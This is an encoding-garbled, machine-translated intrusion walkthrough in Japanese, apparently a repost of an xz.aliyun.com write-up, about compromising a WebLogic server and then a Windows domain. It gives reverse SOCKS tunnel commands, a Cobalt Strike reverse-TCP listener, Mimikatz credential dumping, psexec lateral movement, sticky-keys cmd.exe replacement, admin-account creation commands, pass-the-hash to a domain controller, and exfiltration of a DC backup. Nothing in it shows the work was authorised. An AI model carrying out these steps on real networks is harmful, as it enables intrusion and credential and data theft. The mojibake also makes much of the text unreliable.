ã¹ããŒãªãŒã®åå ã¯æ¯èŒçç°¡åã§ãã®ã§ã3ã€ã®èšèã§èŠçŽããŸããããç§ã¯ãšãŠãã¢ã€ãã«ç¶æ ã§ãã
ç§ã¯äž»ã«ã€ã³ãã©ããããç·Žç¿ãããã®ã§ãæãã·ã³ãã«ã§æãç²ãæ¹æ³ã䜿çšããŠã¿ãŒã²ãããèŠã€ããŸãããç§ã¯FOFAã䜿çšããŠWeblogicã®æ³¢ãããããããã°ããããŠã¿ãŒã²ãããèŠã€ããŸããã
ç§ã¯åã«ãã·ã³ç°å¢ãèŠãã ãã§ããœãããŠã§ã¢ã®æ®ºå®³ã¯ãããŸããã§ããïŒå®éã«ã¯éåžžã«ããããªãã¡ã€ã¢ãŠã©ãŒã«ãããããšãåŸã§ç¥ããŸããããããã¯PowerShellããããã¯ããŸããã§ããïŒãã€ã³ãã©ãããç°å¢ããããŸããã
ããã§ã¯ãCSSã«ä»å±ã®ã¹ã¯ãªããåãããWebé ä¿¡ã¢ãžã¥ãŒã«ãçŽæ¥è©Šããã¯ã³ã¯ãªãã¯ã§PowerShellãããŠã³ããŒãããã³å®è¡ããããã®WebãµãŒãã¹ãçŽæ¥äœæããŸãã
çæããPowerShellãå®è¡ããŸã
ããã®CSã¯æ£åžžã«èµ·åãããŸããã
ããã§ã¯ããŸãã·ã¹ãã æ å ±ãèŠãŠãããŸãã
äžèšã«ãããšããµãŒããŒã¯2012幎ã§ãããã€ã³ãã©ãããIPã»ã°ã¡ã³ãã¯192.168.200.xã§ããããšãããããŸãã
次ã«ãLadonã䜿çšããŠã€ã³ãã©ãããç°å¢ãã¹ãã£ã³ããŸããã
ãã®ã€ã³ãã©ãããã»ã°ã¡ã³ãã«ã¯å€ãã®ãã·ã³ã¯ãããŸããããã¡ã€ã³ç°å¢ãããããšãããããŸããæ¬¡ã«ããã«ããããã¯ãŒã¯ã«ãŒãã®æ€åºãšWebæ€åºãå®è¡ãããŸããã
ãã®ã€ã³ãã©ãããã«ã¯è€æ°ã®ãããã¯ãŒã¯ã»ã°ã¡ã³ãããããWebãµãŒãã¹ãéãããŠããããšãããããŸãã
Mimikatzã¯ã1人ã®ãŠãŒã¶ãŒãšæå·åããããã¹ã¯ãŒãã®ã¿ãèªã¿åããŸã
ãã¹ã¯ãŒãã¯CMD5ã§ããã¯è§£é€ã§ããŸã
次ã¯MS17010ã®æããšããµã€ãã£ã³ã°ãªã¹ãã£ã³ã§ãïŒ
MS17010ãæã€å¯èœæ§ã®ããããã€ãã®ãã·ã³ãããããšãããããŸãããã®ããããœãã¯ã¹ãšãŒãžã§ã³ããéããMSFãçŽæ¥äœ¿çšããŠãããããããšãèšç»ããŠããŸãã
ããã§ã¯ããµãŒããŒãè³Œå ¥ããéã«æ°éã«å¿ããŠè«æ±ããããµãŒããŒãè³Œå ¥ããããšããããšãçããã«ãå§ãããŸããç§ã®ãããªäžæçãªå©ç¹ã«è²ªæ¬²ã«ãªããªãã§ãã ããããã£ã1mã®åž¯åå¹ ã®HKãµãŒããŒãè³Œå ¥ããŸããã CSã«ä»å±ã®ãœãã¯ã¹ãšãŒãžã§ã³ããéãããä»ã®æäœã¯èšããŸã§ããªããããŒã«ã«ãã¹ãæ¥ç¶ã倱æããŸãã
ãããã£ãŠãããã§ã¯ãèè ã¯ãEWã䜿çšããŠãæ°éã§å é»ãããã³ãã«ãåéãããµãŒããŒãäžæçã«éãããšãã§ããŸããç¹å®ã®ããã»ã¹ã¯æ¬¡ã®ãšããã§ãã
EWãã¡ã€ã«ãéãããµãŒããŒã«ã¹ããŒããå®è¡ããŠå®è¡ããŸããïŒew -s rcsocks -l 1900 -e 1200ã¯è»¢éãã³ãã«ãæ§æããŸãã
次ã«ãEWãã¡ã€ã«ãã¿ãŒã²ãããã·ã³ã«ã¢ããããŒãããŠå®è¡ããEW -S RSSOCKS -D XXX.XXX.XXX.XXXïŒäžèšã§äœæããããµãŒããŒIPïŒ-E 1200ãã¿ãŒã²ãããã¹ãSOCKS5ãµãŒãã¹ãæå¹ã«ãããªã¬ãŒãã·ã³ã®1200ããŒãã«éã«æ¥ç¶ããŸããå®è¡åŸã远å ã®æ¥ç¶ã©ã€ã³ãå®äºããããšãããããŸãã
ãã®åŸããããã·ãããŒã«ã«ã§æ§æããã ãã§åé¡ãããŸããã
Windowsããã°ã©ã ã®å ŽåãéåžžãSockscapã䜿çšããŠæ¬¡ã®ãããã·ãæ§æã§ããŸãã
Local Virtual Machineã§Kaliã®MSFã䜿çšããããããKaliã®ãããã·æ§æã¯ãã䟿å©ã§ãããŸããVIM /ETC/PROXYCHAINS.CONFã远å ããäžéšã«ãããã·ã远å ããŸãã
ä¿åããåŸãããã°ã©ã ã«ãããã·ãã£ã€ã³ãçŽæ¥è¿œå ããŠéå§ãããããã·ãæããŸãã
ããšãã°ããããã·ãæãããå Žåã¯ãçŽæ¥æ¬¡ã®ããã«ããå¿ èŠããããŸãã
ã€ã³ãã©ããããžã®éã¯åžžã«ãšãŠãã§ããŒãã§ãã EXPãçµéšããåŸãããŒã«ã倿ŽããŠäººãæºãã¶ã£ãåŸãMS17010ãå®éã«äœ¿çšããããšãäžå¯èœã§ããããšã確èªããŸããã
ã·ã§ãŒãã«ãããåãããšãã§ããªãããããã¹ã倿ŽããŠWebããå§ããŸãã
ãã¹ã¯ãŒãã®åŒ±ãã€ã³ãžã§ã¯ã·ã§ã³ãªã©ã詊ããŸããããGoogle Translatesãèæ¯ãå ¥åããŠãçè§£ã§ããªãã£ããšããŠãã翻蚳ã§ããŸããã§ãããä»ã®æ¹æ³ãèŠã€ããã»ããããã§ãããã
ãããã£ãŠã詳现æ å ±åéãå§ãŸããŸããã
衚瀺ãã°ã€ã³è³æ Œæ å ±ã衚瀺ãããããã
å ±æã³ã³ãã¥ãŒã¿ãŒã®ãªã¹ãã衚瀺ããŸã
ããããç§ã¯å ±æã³ã³ãã¥ãŒã¿ãŒã®Cãã©ã€ãã«ã¢ã¯ã»ã¹ããããšãå§ããŸãã
æåŸã«ãç§ã¯ããã«æ£åžžã«ã¢ã¯ã»ã¹ããããšãããããŸãã
IPãååŸããããã«ãã·ã³ãping 192.168.200.6
ããŒã³ã³ãå³ã¯ãªãã¯ããŠãªã¹ããŒãäœæããŸã
次ã«ãPSEXEC_PSHã䜿çšããŠããµãŒããŒ192.168.200.6ããªã³ã©ã€ã³ã§è©ŠããŠã¿ãŸã
æ£åžžã«èµ·åããŸãã
次ã«ãæ°ããçºå£²ããããã·ã³ã«é¢ããæ å ±ãåéããŸã
ä»ã®çºèŠã¯ãããŸãã
次ã«ãåºçºç¹ã«æ»ãããã®ãããã¯ãŒã¯ã»ã°ã¡ã³ãã«ã©ã®ãã·ã³ããããã確èªããŸã
4ã€ã®Linuxãã·ã³ãã€ãŸã22ã1ã5ã11ãããããšãããããŸã
ãã®æç¹ã§ã匱ããã¹ã¯ãŒãã®æ³¢ã詊ãããšãã§ããŸãã
éã¯å°ãå°ãªããšèšãããšããã§ããŸãã
ç§ã¯åã«ããã»ã¹ã«é¢ããæ å ±ã確èªããŸããããçŸæç¹ã§ã¯ãã§ã«2ã€ã®ã€ã³ãã©ããããã·ã³ãåé€ããŠããŸãããããã¡ã€ã³å ã®ãã·ã³ã§ã¯ãªãããšãããããŸããã§ãããä»ã®Linuxãã¹ãã¯åŒ±ããã¹ã¯ãŒãããã¹ãããæ£ãããããŸããã§ããããåã³è¡ãè©°ãŸããŸããã
ãã®æç¹ã§ãç§ãåãããã·ã³ãVeeamããã¯ã¢ãããšåä»ããããããšãããããŸãããããã¯ããã¯ã¢ãããµãŒããŒã§ããã圌ã®ããŒããã£ã¹ã¯ã«ããã¯ã¢ãããã¡ã€ã«ãããå¯èœæ§ããããšæããŸãããã®ããã圌ã®åãã©ã«ããŒã®ã³ã³ãã³ããæ³šææ·±ã確èªããŸããã
éãæ¥ããšãã«éãæ¢ããããšã¯ã§ããªããšã ãèšãããšãã§ããŸãã
ãã£ã¹ã¯Dã®ãã©ã«ããŒã«ã¯ãããã¯ã¢ãããšåŒã°ãããã©ã«ããŒãèŠã€ãããŸãããããã«ããã3ã€ã®ãã·ã³ã®ããã¯ã¢ãããä¿åãããŠããŸãã
ç§ã¯åã«Baiduã®æ¥å°ŸèŸã宿ãããã ãã§ãVeeam®ããã¯ã¢ããã¬ããªã±ãŒã·ã§ã³ãšåŒã°ãããœãããŠã§ã¢ã§ããããšãããããŸããããã®æ©èœã¯ãvSphereãªã©ã®ããã¯ã¢ãããäœæããããšã§ãã
ããã«ãç§ã®èããæããã«ãªããŸãããç§ã¯veeam®ããã¯ã¢ãããããŒã«ã«ã«ã€ã³ã¹ããŒã«ããå¿ èŠããããŸãã
ã¬ããªã±ãŒã·ã§ã³ãœãããŠã§ã¢ã¯ããã®DCã®å®å šãªããã¯ã¢ããããã±ãŒãžãããŒã«ã«ãšãªã¢ã«å§çž®ããä»®æ³ãã·ã³ã«åŸ©å ããPEãä»ããŠååã倿ŽããCMD.exeã§ååã倿ŽããŸãããã®ããã«ããŠããã°ã€ã³ã€ã³ã¿ãŒãã§ã€ã¹ã®ã·ã¹ãã ã³ãã³ãã©ã€ã³ãåŒã³åºããŠããã管çè ã¢ã«ãŠã³ãã远å ããããã€ã³ã¿ãŒãã§ã€ã¹ãå ¥åããŠCSãããŒã«ã«ã«èµ·åãããã¡ã€ã³å ã®ä¿åããããŠãŒã¶ãŒããã·ã¥ãŠãŒã¶ãŒãçŽæ¥èªã¿åããPTHãä»ããŠãªã³ã©ã€ã³DCãçŽæ¥ååŸããæ¹æ³ãèŠã€ããããšãã§ããŸãã
ãã®ããã¯ã¢ãããµãŒããŒã¯ãããã¯ãŒã¯ãé¢ããªãã£ãããã圌ãèšã£ãããã«åœŒã¯ãããããŸãããã圌ãš21ã®ãããã¯ãŒã¯ãªãªãŒã¹ãã·ã³ã«ã¯å ±æãã©ã«ããŒããããŸãã圌ã®åäœãä¿é²ããããã«ã圌ã¯å¯ãã«ããã¯ã¢ãããµãŒããŒã«é ãããã¢ã«ãŠã³ããäœæããææ°ã®DCãã«ããã¯ã¢ããã700mã®å§çž®ããã±ãŒãžã«çŽæ¥å§çž®ãããã¹ãŠãå ±æãã©ã«ããŒã«é 眮ããŸããã
ãããã¯ãŒã¯å€ã®ãã·ã³ã«ã¯ããŒã7001ã®ã¿ããããããWeblogic Webãã¹ãèŠã€ããããã¹ãŠã®å§çž®ããã±ãŒãžãå ±æãã©ã«ããŒããWebãã¹ã«å ¥ããWebåŽããããŠã³ããŒãããŸããããã®ãããã¯ãŒã¯ã¢ãŠããã·ã³ã®åž¯åå¹ ã¯äœããããããå¹³åé床ã¯200kã§ãããç«ã¡åŸçãç¶ãããããé·ãéåŸ ã£ãŠããæçµçã«éããŸããã
ãã®é·ãããŠã³ããŒãããã»ã¹äžã«ãVEEAM®ããã¯ã¢ããã¬ããªã±ãŒã·ã§ã³ãœãããŠã§ã¢ãæåã«ããŠã³ããŒãããŸããã
çªç¶ãç§ã¯éåžžã«è峿·±ãããšãèŠã€ããŸãããã€ãŸãã圌ã¯ããŒã«ã«ç®¡çè ã¢ã«ãŠã³ãã§ã®ãã°ã€ã³ããµããŒãã§ããããšã§ãã
ãããŠã圌ã¯ä»ã®IPSãšãšãã«ä»®æ³ãã·ã³ãããã¯ã¢ããããã®ã§ã圌ã¯VSphereã«ãã°ã€ã³ããã¹ãã ã£ããšæããŸãã
ããã§ãç§ã¯ãšãŒãžã§ã³ããæ¥ç¶ããŠãããäžåºŠãã§ãã¯ã¢ãŠãããŸãããæ¡ã®å®ãç§ã¯ãããæ£ããæšæž¬ããŸããããŠãã¯é¢éžããŸããã管çè ã®ç¹æš©ã«çžåœããŸãã
ããŒã«ã«ã§ããŠã³ããŒããããå®å šãªããã¯ã¢ããã¯ãããŒã«ã«ã§åŸ©å ããã®ãéåžžã«ç°¡åã§ãããœãããŠã§ã¢ãããã«ã¯ãªãã¯ããŠããœãããŠã§ã¢ãèªåçã«éãã ãã§ãã
å®äºãã埩å
次ã®ã¹ãããã¯ç°¡åã§ãã Lao MaotaoãããŠã³ããŒãããŠãISO PEããŒã«ããã¯ã¹ãçæããŸã
ä»®æ³ãã·ã³ã«ããŠã³ãããESCããã¯ãŒã§æŒããŸã
PEãå ¥åããåŸãCMD.exeãOSK.Exeã«åå倿ŽããŠãå ã®C Disk \ Windows \ System32 \ osk.exeãäžæžãããŸãããã®ããã«ããŠãã³ã³ãã¥ãŒã¿ãŒããªã³ã«ãããšãã«ç»é¢ããŒããŒãããªã³ã«ãããšãã·ã¹ãã æš©éãåããã³ãã³ãã©ã€ã³ããããã¢ããããŸãã
ããã«ãŠãŒã¶ãŒãçŽæ¥è¿œå ãããšãããã€ãã®åé¡ãçºçããŸããã
æåŸã«ããã¡ã€ã³ãŠãŒã¶ãŒã®ãã¹ã¯ãŒãã倿ŽããåŸãããŒã«ã«ç®¡çè ã°ã«ãŒãã«è¿œå ãããã·ã¹ãã ã«æ£åžžã«å ¥åããŸããã
EXEã®æçµäžä»£ãçºå£²ããããšããHANPIãã¡ã€ã¢ãŠã©ãŒã«ãæçµçã«ä¿è·ããå§ããŸããã
ãã³ãã³ãã¡ã€ã¢ãŠã©ãŒã«ã«ããã³ããã¥ãŒãäžããŸãã
TMDã¯ãŸã ç§ã®ããŒã«ã«ä»®æ³ãã·ã³ã§ç§ããã©ããŒããŠããŸããïŒç§ã¯ããªããã·ã£ããããŠã³ããŸããã
ãã ããéããã«ã¯ãã¹ã¯ãŒããå¿ èŠã§ããå¿ããŠãææ ¢ããŠãã ããã
æåŸã«ãå ã®PowerShellã§çºå£²ãããŸããã
ãã®åŸãæãååŒçãªã·ãŒã³
æçµçã«ãããã·ã¥ã䜿çšããŠãªã³ã©ã€ã³DCãšæŠãå¿ èŠããããŸãããããã¯ãã¹ãŠå®äºã§ãã
ä»äºãçµããŠå¯ãåŸã
èŠçŽ
1ãFOFAãä»ããŠã¿ãŒã²ããã·ã¹ãã ãæ€çŽ¢ãããšãããŒã«ã䜿çšããŠWebLogicãä»ããŠWebLogic Frameworkãšå®è¡å¯èœã³ãã³ããæ¡çšãããŸããããã§ã¯ãã¿ãŒã²ããWebãµã€ãã·ã¹ãã ã«Ice Scorpionã®æãã¢ããããŒãããŸãããŸããã¿ãŒã²ããã·ã¹ãã ã«ããããªãã¡ã€ã¢ãŠã©ãŒã«ãããããšãããã£ãŠããããã¹ãåŸããã¡ã€ã¢ãŠã©ãŒã«ã¯PSã¹ã¯ãªãããååããŸããã§ããã 2ãVPSã§ãCDã«ä»å±ã®ã¹ã¯ãªããä»ãWebé ä¿¡ã¢ãžã¥ãŒã«ã䜿çšããã¯ã³ã¯ãªãã¯ã§PowerShelsãããŠã³ããŒãããã³å®è¡ããããã®WebãµãŒãã¹ãçŽæ¥äœæããŸãã URLãã¹ïŒ /A /123ãã¹ãã¢ãã¬ã¹ïŒã¿ãŒã²ããã·ã¹ãã IPããŒãïŒ80ãªã¹ããŒïŒHTTPSã¿ã€ãïŒPoseshell3ã PowerShelãå®è¡ãããšãCSãæ£åžžã«èµ·åãããŸãã 4. Cã³ãã³ããä»ããŠã¿ãŒã²ããã·ã¹ãã æ å ±ãã¯ãšãªããã¿ãŒã²ããã·ã¹ãã ãWin2012ã§ãããã¿ãŒã²ããã€ã³ãã©ãããIPã192.168.200.200.21SystemInfoshell IPConfig5ã§ããããšãçºèŠããŸããã CSãä»ããŠLadonãã¿ãŒã²ããã·ã¹ãã ã«ã¢ããããŒãããLadonãä»ããŠã€ã³ãã©ãããã·ã¹ãã ãã¹ãã£ã³ããã¿ãŒã²ããã«WebãµãŒãã¹ãã¹ããããããšã確èªããŸãã Landon 192.168.200.1/24 Osscan6ããŠãŒã¶ãŒåãšãã¹ã¯ãŒãã®ããã·ã¥å€ã¯Mimikatzãä»ããŠæ£åžžã«èªã¿åããããã¹ã¯ãŒãNTMLã¯MD5ãä»ããŠåŸ©å·åãããP@SSSW0RDã«åŸ©å·åãããŸãã 7.ãããMS17-010 LADONãã¹ãã£ã³ããããã€ãã®ã·ã¹ãã ã«MS17-010ã®è匱æ§ãããããšãçºèŠããŸãããã©ã³ãã³192.168.200.1/24 MS170108ããããªãã¯ãããã¯ãŒã¯VPSã§æ¬¡ã®ã³ãã³ããå®è¡ããŠãããŒã1900ãåãåã£ããããã·ãªã¯ãšã¹ãããã¹ãEWã«è»¢éããŸããããã¯ãããŒã1200 EW -S RCSOCKS -L 1900 -E 12009ã«æ»ããã¹ãEWã«æ»ããŸããEWãä»ããŠEWãã¿ãŒã²ããã·ã¹ãã ã«ã¢ããããŒãããæ¬¡ã®ã³ãã³ããå®è¡ããã¿ãŒã²ãããã¹ããœãã¯ã¹5ãµãŒãã¹ãã¿ãŒã²ãããã¹ã1200ã«æ¥ç¶ã§ããããã«ããŸãã xxx.xxx.xxx.xxx.xxxïŒãããªãã¯ãããã¯ãŒã¯VPS IPïŒ-E 120010ãããŒã«ã«Windowsã¯SockScapãããŒã«ã«ã«äœ¿çšããŠSock5ãããã·ãæ§æããŸããããŒã«ã«ä»®æ³ãã·ã³ã®Kaliã®MSFã Kaliãããã·æ§æã®æ¹ã䟿å©ã§ãããŸããVim /etc/proxychains.confãSock5ãSocks5 Target IP 190011ã«è¿œå ããŸããKaliã§ã¯ããããã·ããã³ã°ãããå Žåã¯ãProxychains msfconsoleã§ãã Sockscapã§ã¯ãIntranet Webã¢ã¯ã»ã¹ã«äœ¿çšãããSockscapã§Ibrowserãã¢ã¯ã»ã¹ããSocks5ãããã·ã远å ããŸããã匱ããã¹ã¯ãŒãããã¹ãããŠå ¥åããããšã¯äžå¯èœã§ããããšãããããŸãã
12.æ å ±ãåéãç¶ãããã°ã€ã³è³æ Œæ å ±ã衚瀺ããã·ã§ã«CMDKEY /L13ãæã£ãŠããŸããå ±æã³ã³ãã¥ãŒã¿ãŒã®ãªã¹ãã衚瀺ããã³ã³ãã¥ãŒã¿ãŒCãã£ã¹ã¯ã«ã¢ã¯ã»ã¹ããŠã¿ãŠãã ãããããã¯ã¢ããã³ã³ãã¥ãŒã¿ãŒã¯ãå ±æã·ã§ã«ãã¥ãŒãº\\ veeam-backup \ $ 14ã«ã¢ã¯ã»ã¹ã§ããããšãããããŸãããã¿ãŒã²ããå ±æã³ã³ãã¥ãŒã¿ãŒãpingããããšã«ãããIPã¢ãã¬ã¹ã¯192.168.200.6ã®Veeam-Backup15ãç §äŒããŸãã CSã®ãªã¹ããŒãäœæããŠãªã¬ãŒ---ãªãã¹ã³ - nameïŒc2ïŒããã€ããŒãïŒWindows/beacon_reverse_tcpïŒãHost :192.168.200.21ããªãã¹ã³ããport:44444416ãèããŸããæ¬¡ã«ãPSEXEC_PSHã䜿çšããŠããªã³ã©ã€ã³ã§192.168.200.6ã詊ããŠã¿ãŸãããæåã¯ããã¹ããžã£ã³ãPSEXEC _PSH 192.168.200.617ã«äœããªãããšãããããŸããã以åã®Ladonæ€åºã«ãããã€ã³ãã©ãããã®ãã¹ã22ã1ã5ãããã³11ãLinuxã·ã¹ãã ã§ããããšãããããŸããããã¹ã¯ãŒãã匱ããšã192.168.200.22ã«ãã¹ã¯ãŒãã匱ãããšãçºèŠããŸããããLinuxãã¹ãã«å©çšå¯èœãªSSHã¯ãããŸããã§ããã 192.168.200.22ã«ãŒã12345618ãVeeam-Backupãã¹ãã«ããã¯ã¢ãããã¡ã€ã«ãèŠã€ããŸãããããã¯Veeam®ããã¯ã¢ããã¬ããªã±ãŒã·ã§ã³ã®ãœãããŠã§ã¢ã§ããããã®æ©èœã¯VSphereãªã©ã®ããã«ç¹ã«ããã¯ã¢ãããäœæããããšã§ãã 19ãVeeam-Backupãå€éšãããã¯ãŒã¯ããåºãªãããšãçºèŠããŸãããããã§ã¯ã7Zã䜿çšããŠããã¯ã¢ãããã¡ã€ã«ãããã±ãŒãžåããã³å§çž®ããŸããã¿ãŒã²ããã·ã¹ãã ã®Webãã£ã¬ã¯ããªã§ãã³ãã³ãå ±æãéããŠããã¯ã¢ãããã¡ã€ã«ãã¿ãŒã²ããã·ã¹ãã ã«ã³ããŒããŸãã 19.ããã¯ã¢ããã¬ããªã±ãŒã·ã§ã³ãããŒã«ã«ã«ã€ã³ã¹ããŒã«ããããã¯ã¢ãããã¡ã€ã«ã埩å ããŸãããã°ã€ã³ãŠã£ã³ããŠã«ã¯ãããã©ã«ãã®ãŠãŒã¶ãŒåããã¹ã¯ãŒããIPãããããšãããããŸãããããã«ã¯ãã¿ãŒã²ããã€ã³ãã©ãããã§ã®ãã°ã€ã³ãå¿ èŠã§ããããã§ã¯ãSOCK4ãããã·ãæå¹ã«ããããšã«ããããããã·ãã¡ã€ã¢ãä»ããŠããã¯ã¢ããã¬ããªã±ãŒã·ã§ã³ãããŒã«ã«ã«ããŒãããSOCK4ãããã·ã«æ£åžžã«ã¢ã¯ã»ã¹ã§ããŸãã 20ãããŒã«ã«ã§ããŠã³ããŒããããå®å šãªããã¯ã¢ããããããŒã«ã«ã§åŸ©å ããã®ãéåžžã«ç°¡åã§ãããœãããŠã§ã¢ãã€ã³ã¹ããŒã«ããŠããã«ã¯ãªãã¯ããŠã埩å ã®ããã«ãœãããŠã§ã¢ãèªåçã«éããŸãã 21. Lao Maotaoã®WinPEãä»ããŠã·ã¹ãã ã«å ¥ããŸããããã§ã¯ãCMD.exeãããã§OSK.exeã«å€æŽããŠãå ã®C Disk \ Windows \ System32 \ osk.exeãäžæžãããŸãããã®ããã«ããŠãç»é¢ããŒããŒãããªã³ã«ãããšãã·ã¹ãã èš±å¯ã³ãã³ãã©ã€ã³ããããã¢ããããŸãã 22ãã³ãã³ãã¯ãšãªãéããŠã埩å ãããã·ã¹ãã ãéåžžã®ãã¡ã€ã³ãã¹ãã§ããããšãããããŸãããããã§ã¯ããã¡ã€ã³ãŠãŒã¶ãŒãããŒã«ã«ç®¡çè ã°ã«ãŒãã«è¿œå ãããã³ãã³ãã®è¿œå ãéããŠããŒã«ã«ç®¡çè ã°ã«ãŒãã«è¿œå ããåŸãã·ã¹ãã ã«æ£åžžã«å ¥åããŸãããããããŠãŒã¶ãŒhanli quer1345 @ /addnet localgroup管çè hanli /add23ã CSã®ããã¯ãã¢ãä»ããŠä»®æ³ãã·ã³ã§ãªã³ã©ã€ã³ã«ãªããCSã®Hasdumpãä»ããŠããã·ã¥ãèªã¿åããããã·ã¥ãä»ããŠããã·ã¥ãä»ããŠå ã®ãªã³ã¯ãééããŸãïŒhttps://xz.aliyun.com/t/9374